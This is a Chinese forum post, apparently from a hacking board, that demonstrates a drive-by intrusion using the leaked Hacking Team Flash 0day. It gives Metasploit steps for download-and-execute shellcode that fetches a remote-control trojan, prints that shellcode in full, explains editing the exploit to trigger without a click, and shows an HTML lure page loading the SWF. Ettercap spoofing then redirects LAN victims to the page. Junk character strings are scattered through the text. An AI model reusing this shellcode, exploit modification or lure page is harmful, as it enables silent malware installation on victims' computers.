|
9 |* v. A% z' {/ O
三、flash 0day之手工代码修改制作下载者实例入侵演示
1 }& N$ V2 o0 P* @0 D- d* o# H2 q
4 k9 l; P7 e) N* q- \. R; |4 c9 y* z" I/ G# h: @3 s9 w
利用到的工具: : {$ {: l2 L* R
- L o# }6 Z6 L: E) a+ I* {$ }% _5 e% x+ T
Msf . E M$ Q6 B7 m; `
' q0 L9 b2 M4 Y$ ^# _4 s4 C
. N3 |! ?5 G1 p& ` Ettercap ( Z' ^# a+ o7 q
$ L# l5 C4 Y; a& [4 _, ~/ ^
]3 R8 e) G8 \# y" t
Adobe Flash CS6
4 Y T1 s5 ^8 I
; ]" w% s: S" ~( T1 [5 _
2 `3 r# q# ]" e& f# ?( b6 x Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
! L4 u% c$ z0 O1 C( y
@1 i) @9 W/ o; j; f' k, `4 u+ Z7 J( i4 k9 `4 ]" d* Y
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
% C. z+ W* |- P/ b 3 d+ {& w D* b% ]0 Q# ]
8 p- Q# ~' L/ E1 p6 X 如图:
2 q! l" ^6 }- R* _
5 T- a _0 A, M* }" K7 l; B
) X8 K* J3 b" P/ j& P8 Q7 P
" g3 Y- g5 H* T$ H 9 ?- q% i3 @% E
9 A3 ]$ F2 K4 W" @  5 s/ X2 a4 q1 A+ t- W
8 s4 @1 d; I5 H1 A
( O4 R# P) ]- O6 P! X 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
$ z& h0 z h% w! ^( k% ?0 J2 R
l# J) v" w; M5 C( F" b& b, ?4 [( g: o* D( c3 v; f
! e- D' p9 m# X1 K # z3 J# H, v$ ^7 s7 y. ?- L( ~
: ]! K0 Z% {8 i% j0 e
* h+ r3 E$ x- V4 B
, {! N; C9 _1 U6 l
0 O* ^, n# V2 S% x1 ^ 然后执行generate -t dword生成shellcode,如下: ( r5 Y/ _% y) O5 R( y6 u# }' W
5 P3 X2 p7 N0 d) P. P" }' P# x/ z# y# d* V
( a' D0 ~9 [: V/ F, n $ A3 w* e2 g( W. T& U
8 ]5 C9 J0 w( R a6 x
复制代码到文本下便于我们一会编辑flash exp,如下:
2 m, ~# F1 i6 d ) [/ l7 Z" f9 N5 l: P
% p" G; r* a* o- _' }! s 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 8 m& d* E% G: |9 v3 F( ~+ V3 m0 s0 e
& j& C8 ?3 m+ D
5 \- ~, f- F. o$ G; w 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
: j7 U% v: k6 `5 s' t* Y& g2 ] ! e u! j, B9 q, Q
5 ?2 N6 R5 {" T( ?+ ]4 [' N
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, $ J) j0 c, j9 \( r- s0 ]5 y
, y/ c9 z: A$ ]
5 l7 Y3 Y: R7 u p' L7 F, R4 p
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
9 Q. A3 I4 i+ Y, J: u5 b
' ]0 h# d' s4 c7 L. K2 g: X( H/ v# P2 d/ w/ A/ e7 f e t
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 0 H6 g3 z1 l$ `. n7 f# W( r# E
3 J3 \ X* I9 a3 ?& C
" N" I) t& z5 _( k$ r* e$ i- u) f 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, & s9 B; N" ^, }7 [6 P
" Z6 a9 L$ o. n% K$ y3 _! D. p$ K; `3 p( L( a* }$ G0 [
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, $ d' i0 D: c) m* ?
0 L$ ^3 h# I2 q( m% E7 A# }
0 J! y+ Z; D0 z7 _8 F: ~) K6 I 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
& n7 o0 w( X. o+ ` i
9 S3 a. U% l5 H" n% h6 f/ k+ B. R4 G8 {! j4 x0 s, }
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, " I. d# D% z! V2 u. s7 i
8 `# X& C3 o( A6 \3 C6 X
3 |3 {/ m* ?, }- C5 E" J9 x
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ! e8 p3 @0 q8 \: y) r
, p- o' N- y0 I: N
7 \2 o' S1 b9 _ G3 M 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 4 a1 A6 ^" I; ~
9 q6 C4 w: o. e' d1 J9 G q! P& Y7 s6 r
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 9 R4 N! s9 }2 m
; P" t0 G+ u m
( r, s/ ^& k$ L3 n2 ] 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
' U& F3 N: q* Y8 x. u5 r
% J4 _( |. }4 F5 t0 V2 I! E. @. V3 y
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
1 x" j# h8 I9 ]7 i; u7 G; Y# J
" Y2 @% H. G! O
1 R0 ?/ Z* p( |1 A- o % {2 K4 P+ c M& \
v0 C& b: u+ w
# [& p) _) x1 v+ L5 j1 V
5 d4 W! X N/ r( v
1 _6 C0 J8 E \9 v2 ^
6 ~3 n- h0 t3 u( |" `- R 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ( K; `+ p0 G. x+ n( H
% G+ P# l' G, l# o9 W$ D- o4 b7 @' U3 W4 M% M" ^' M0 Z: l9 { T
* m- I! G+ C) H' C
6 v9 ^; t0 Y; O, t" I) f
+ q! c/ E9 Y1 e. d$ u q 先修改ShellWin32.as,部分源代码如图:
3 I9 e$ H8 ^2 r+ N; h; h
" H3 c" e* E! r' h! l5 I3 e, A9 y! p$ k, H7 ~
" q) M# ?0 M8 H @3 {" c# {' S v/ w
" {) q N6 @8 ]! A* c
+ r' A! B* P( m- R X 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: . S9 V& u$ Z1 } m! q
8 I' W* a5 }9 K
* W* }5 D! a. B- Y. Z 
& D7 k+ A3 R2 s6 {. ? . a8 h( E: F C' h/ z; o$ d' `
- U8 M, u6 }# u2 j 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: $ d: A$ X$ u+ z A Z
/ l4 L8 O" k6 ]
" a& v% P7 G+ N: w; Q r  6 X+ i0 V {2 c- I, X& Y9 G0 S
( \8 o$ h" o ^* d! f7 T- V/ ~
( s3 M! P9 G& |: o4 _* q
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 9 Q+ `/ a& s8 Z
6 \# I6 I; a# H3 T! f- Q
5 M1 {. }' `# D. H; g0 a! W& n 9 D1 z; f1 Z! V% s, c
- [7 r3 B9 f! ]3 D4 q# R3 h( E+ {
1 X6 f$ o6 F! |. T) F 6 a3 C1 s% f! p. L, e
: Z, w |& Q: I, \+ L* `5 J& c
& c& i+ V( R; b6 p; s  ; _ B& g5 G! E) u6 _ r: S2 I
6 [) L( a2 i# @, H: z' W4 `+ G6 X7 ~& c6 @8 w8 h' @! Q' f" B- r
然后点保存,下面我们来编译一下,打开
: {* [4 ^! R2 S/ w2 ~, H) L$ c! Z( `; c
6 y1 c. ^4 p1 V5 p( N* {. W7 i' A; r
exp1.fla然后点文件-发布,看看编译没错误
. B, _1 _: R4 q& m. V
) F% j/ K7 L5 Y3 N. T
' M8 s1 M/ [) F& N% n9 i
0 k' y) q/ f8 X0 L8 |1 R$ s
# K9 ~3 X0 i2 ]7 D/ G9 i3 ~* H
/ l/ Y+ c: `; `" r. W ( }7 \# w7 r z7 s7 w) v2 s
# }+ i( r9 j1 {( B0 ~2 c3 Q( \% ]8 ?( N5 _ ^
3 u. Y7 O y9 I8 q2 B
$ F+ m% f& B ~5 w) ~+ I1 w
0 P! q0 Y9 o9 O& L3 K/ o1 ?  1 q# K3 K0 ] S! H' l
" F) L: z2 R6 i+ _
8 Y& W2 D& ^0 O/ Q8 [ 然后我们把生成的
" _8 v& L/ e2 E$ G% L) W" r/ N
7 _. x! q0 W3 a9 l
( l4 X K5 m+ E$ n) D! R: ` exp1.swf丢到kailinux 的/var/www/html下: $ S' Y% L' U1 _
8 }2 [( Z' d7 Q4 ^. E
8 A0 g5 L5 x, t$ A
然后把这段代码好好编辑一下 4 M4 `. q. V1 ^; j
$ T" n) p) q: b# e& u5 c$ R" P
' C" F7 J8 y! O2 h% q . g' @2 g q2 b8 A; c! w1 m; L
- [! J$ s9 J# T3 W) r2 U3 x, J E
) |. D, q) N. J- Z $ F" W9 |! u Z! X
# d$ Q! c3 o5 d( I% r7 @
7 s, ?6 I3 i h0 m/ g # r5 @! j7 s7 f1 d; D
4 n9 u4 |5 H. A0 q% h
$ q! T. |, d2 I+ b3 h
F4 ?' z; |( T% I
4 O. @2 e" M4 E6 c1 ?+ D6 R" j7 J4 ^
. i2 v, k2 |# ^0 S3 H! I . _9 B% O1 m$ q0 a" ^/ C8 v. B5 ]
% J q1 a# F9 q" r
# `. K- R/ G! L3 N ) J8 n( k; |4 C3 D1 j+ F% r. E% f( w7 T
) w" A+ v' q1 M9 J" B' G6 B4 } u <!DOCTYPE html> & n% D7 W9 {& s/ r( s' I$ E" V
1 K* f& {) x2 K# D- I7 d0 ?3 \( Y6 U
<html> 4 Y: k4 u8 A, Q6 e. w" L
2 X" C1 W( {1 u6 e
+ N$ v: {8 \- L7 X) [ <head> . N; Z/ M+ z3 L
1 ], z+ X8 e. m5 Y
8 d9 K6 T: }5 ^; ` <meta http-equiv="Content-Type" content="text/html;
$ h$ A/ [5 i$ b6 m: F8 G6 ?# \) r 9 z# ^/ i9 B* j1 Z+ z$ l
K7 B8 r* R' F8 v! w* T" J
charset=utf-8"/>
7 e% l1 R2 {4 f 5 K8 Q: i }$ E) l
" s- \ I& j+ P" W
</head>
% m4 Z, g' @2 T+ x& w
, t( M ?& d/ O
% d6 s# P b1 j$ \( v" d <body>
) R$ N) V$ B/ C+ [ / \, C; Z, U+ [0 ?3 X1 r
! Q5 Z9 D2 g* a; d: }& a* } <h2> Please wait, the requested page is loading...</h2>
# `- M. M% `- e) d
, ?$ S1 i4 m& o, T0 g/ n- E+ u$ l
<br> - r0 ^8 Z2 y2 b% k; t
% M9 B, F$ ~& }0 L' f- [
& K6 g, C% Z4 n- L <OBJECT
0 b1 w7 N# X) m1 ?" o) P
/ ]! i; {4 O2 \; V9 j( Q0 @ M% v) H+ @. }0 A. }
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie ; t2 s# ?0 x% I+ p4 ?
& x4 l; B2 ~, O' A7 q5 ]9 S( z0 \; Q, C* H5 a& V" z5 K3 R; g2 F
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
3 X; S5 x: A' F/ t- B 6 M# q8 P, }9 I5 h1 ]; l
; u6 q' w* ~" {+ m </body> 6 f5 d2 i0 K; y2 y
6 k2 _2 x6 {* p# n5 l3 y
0 h" \3 W! e. ?5 e
<script> 7 Q! W3 S, b: ~5 {3 {
6 l* N. S# S; }. |5 i8 j" y
0 @1 D3 n" ?% e8 M/ Q' b8 ` setTimeout(function () { ! x9 _0 s2 a; `( X) X
0 R2 l' u# I' Z* \; s
9 f' r4 j; q# N3 l% S, `8 j
1 v- g( m4 R1 i4 y 5 x. ?1 c0 [7 y
2 m1 y+ I3 m) d2 I7 H a0 z+ v& ~
window.location.reload(); ; @- N1 ^& E2 Z0 `8 U
) m/ `/ @8 U" |9 T& ^: D; |' i* [! P$ D+ r
}, 10000);
u$ w6 q) q3 J. o( F: G
# n' ?# |, g* S7 ?) a! E+ R: `0 `) r. j( P3 b8 r& G
Z# C! `+ |/ f7 X
; u: T5 Q: }3 ~
4 Z% q5 S* [/ K7 r2 O; v </script> 2 }7 u$ j, v! f
4 V h. x8 A' D% m) ^# P. R' X
# T6 |% p: B6 Z. P" {# L
</html>
- v; K* J- L/ d 7 j1 p& Q9 m( A0 a L1 k
; T" R) \1 V, S, \/ k$ e2 v
% `, x1 l# w5 N
; U S% A, h, j+ _" V1 M+ t: z' L& @/ Y7 X% V3 Z1 l0 m; D4 L* {
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
1 } b& p7 O3 h& M+ g% @* ^ ) w% K9 h( m S, v$ O: z7 D
" }" C) L: @7 S
 ! m. @5 f+ W$ Z2 w7 J# n8 Z4 w; I
- o: Z6 f9 D4 `* Z$ T% u
9 x% X. \0 G0 q4 s
9 j. ]) D: Y4 g
: F; x/ q3 V; x) y" E& q8 i" N. X+ j" y V S
. m/ B8 d% |% {1 Q7 t0 y
" ^4 a3 x% K4 g; k
( a3 y j8 ~$ T& K% j( K5 L
- S0 s! K/ @+ M) _7 g& H9 t: {
% P/ v- I" f) C$ w4 [8 h( s3 Z5 y4 I( v; u; T9 I! @
) e/ _( d1 r' ]5 i' F0 V% z ! q" X; c& U1 G3 s
/ i: R% O% X0 e6 @- N% A. E 下面我们用ettercap欺骗如图:
2 w6 K! I' j; g1 C9 V2 `) t; Z# n + @6 u( P2 G% x6 s
3 D; Z w$ Z, U% P4 f; ]: j( b; Y
 7 I; x# d0 x* N- c8 y" g
& }) ^# U D& O5 J( L" U( l0 ^+ Q3 X) l+ i/ k4 H: A" ~) P5 ]
8 w2 s' t0 I8 x; D8 l
$ q. _( b) T0 s& F9 G
; U8 T$ x5 t! z0 {+ a% [2 G6 c8 t 下面我们随便访问个网站看看:
6 u7 c* o* }# y" B Y/ y2 `" F8 T+ M $ [1 {3 d' f0 y2 F" ]' q& T8 Q& i1 v i
' a( B p" M/ z 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: # G( r* l2 y( H
4 d+ ^8 E" L+ F, l# g
& Q1 N, b$ T0 e' R% u+ h& R* D% e  8 O! p+ E' J$ q" Y( w. Q$ F
% `: N- p1 r- q2 d$ I9 \" k" N# I a
4 r' P2 C+ ?( f* t- f7 u- E: k3 k 我们看另一台, 6 S8 {" y+ a* [8 B; G
. U+ W7 l- Q7 N% B/ B+ k$ K8 j& G7 |: s4 |0 z u ]& m8 G' t) I% x0 l
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 $ o$ G1 c: l" b& {0 I
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对